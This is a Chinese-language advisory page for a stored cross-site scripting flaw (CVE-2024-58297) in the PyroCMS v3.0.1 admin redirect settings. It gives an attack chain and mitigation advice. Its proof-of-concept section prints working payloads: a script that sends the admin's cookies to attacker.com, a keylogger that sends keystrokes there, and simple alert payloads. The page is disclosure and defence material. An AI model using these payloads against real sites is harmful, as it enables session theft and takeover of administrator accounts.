CVE-2024-58297 CVSS 5.4 中危

CVE-2024-58297 PyroCMS管理重定向配置存储型XSS漏洞

披露日期: 2025-12-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-58297

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PyroCMS v3.0.1

漏洞概述

CVE-2024-58297是PyroCMS v3.0.1版本中存在的一个存储型跨站脚本漏洞。该漏洞位于管理后台的重定向配置功能中，攻击者可以通过在「Redirect From」字段注入恶意JavaScript代码来实现持久化的XSS攻击。由于漏洞位于管理后台，当具有管理员权限的用户访问重定向配置页面时，注入的恶意脚本会自动执行。攻击者可以利用此漏洞窃取管理员的会话Cookie、伪造管理员操作、执行任意管理功能，甚至可能进一步渗透整个系统。此漏洞的CVSS评分为5.4，属于中等严重程度，攻击向量为网络，认证要求为低权限，但需要用户交互才能触发。漏洞已于2025年12月11日被披露，发现者为[email protected]。

技术细节

该漏洞本质是一个存储型XSS（Stored XSS）漏洞，存在于PyroCMS管理面板的重定向管理功能中。漏洞的根本原因在于应用程序在处理用户输入时未对「Redirect From」字段进行充分的输入验证和输出编码。当管理员添加或修改重定向规则时，攻击者可以在该字段中插入恶意JavaScript代码，如：<script>alert(document.cookie)</script>。由于应用程序未对输入进行过滤，该恶意代码会被直接存储到数据库中。当其他管理员访问重定向列表页面时，存储的恶意代码会从数据库中被读取并直接渲染到HTML页面中，导致JavaScript代码在受害者浏览器中执行。攻击者可以利用此漏洞获取管理员的认证令牌、执行任意管理操作或进行进一步的攻击。修复此类漏洞需要在输入阶段对所有用户可控数据进行严格的白名单验证或HTML实体编码，并在输出阶段根据上下文进行适当的输出编码。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录PyroCMS管理后台

STEP 2

步骤2

导航至重定向配置页面(/admin/addons/settings/redirects)

STEP 3

步骤3

在Redirect From字段中注入恶意JavaScript/XSS payload

STEP 4

步骤4

保存重定向规则，恶意代码被持久化存储到数据库

STEP 5

步骤5

管理员访问重定向列表页面，触发存储型XSS执行

STEP 6

步骤6

恶意脚本窃取管理员Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2024-58297 PoC: PyroCMS Stored XSS in Admin Redirects -->
<!-- Author: Vulnerability Discovery Team -->
<!-- Date: 2025-12-11 -->

<!-- Step 1: Login to PyroCMS Admin Panel with low-privilege account -->
<!-- Navigate to: /admin/addons/settings/redirects -->

<!-- Step 2: Inject XSS payload in 'Redirect From' field -->
<!-- Payload: -->
<script>
  // Steal admin cookies/session
  fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie), {
    method: 'GET',
    mode: 'no-cors'
  });
  
  // Alternative payload - keylogger
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
  });
</script>

<!-- Step 3: Save the redirect rule -->
<!-- When admin visits the redirects page, XSS executes automatically -->

<!-- Simple PoC payload for verification: -->
<img src=x onerror="alert('XSS Confirmed - CVE-2024-58297')">

<!-- The payload can also be: -->
<svg/onload=alert(document.domain)>

影响范围

PyroCMS v3.0.1

防御指南

临时缓解措施

在官方补丁发布前，建议临时禁用或限制重定向配置功能的使用，对管理后台实施额外的安全监控，限制低权限用户对管理功能的访问，并配置Web应用防火墙(WAF)规则检测和阻止XSS攻击payload。同时提醒管理员不要点击可疑链接，定期更换管理密码，并启用双因素认证以降低账户被盗用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表